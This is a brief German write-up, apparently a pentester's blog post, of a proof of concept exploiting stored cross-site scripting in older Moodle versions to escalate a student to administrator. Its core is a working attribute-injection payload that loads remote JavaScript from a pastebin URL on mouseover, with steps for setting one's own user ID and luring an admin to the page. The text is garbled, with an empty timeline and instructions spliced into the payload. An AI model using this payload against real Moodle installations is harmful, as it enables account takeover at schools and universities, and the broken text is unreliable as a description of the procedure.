
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS-PoC für Privilege Escalation (Student zu Admin)
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS-PoC zur Rechteausweitung (Student zu Admin). Dies ist einer der früheren Bugs, den ich während eines Pentests in einer akademischen Einrichtung entdeckt habe. Er war damals erfolgreich genug, um praktisch Admin-Zugriff zu stehlen und die vollständige Kontrolle über Moodle mit nur einem einzigen Bug zu erlangen.
Wir können aus der Git-Historie ersehen, dass der Bug seit alten Versionen von Moodle (2003) existierte und erst 2019 gepatcht wurde.
Zeitleiste:
NUR FÜR BILDUNGSZWECKE. VERWENDEN SIE DEN EXPLOIT NICHT FÜR ILLEGALE AKTIVITÄTEN. DER AUTOR IST NICHT VERANTWORTLICH FÜR MISSBRAUCH ODER SCHÄDEN.
userid in Ihre eigene ID. Nehmen wir an, die URL lautet https://pastebin.com/raw/xxxxxxxx." style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')/userpix/ zu öffnen, oder fügen Sie den Link zu dieser Seite in Ihren Beitrag ein und warten Sie.Bei Erfolg wird Ihr Konto als Administrator hinzugefügt.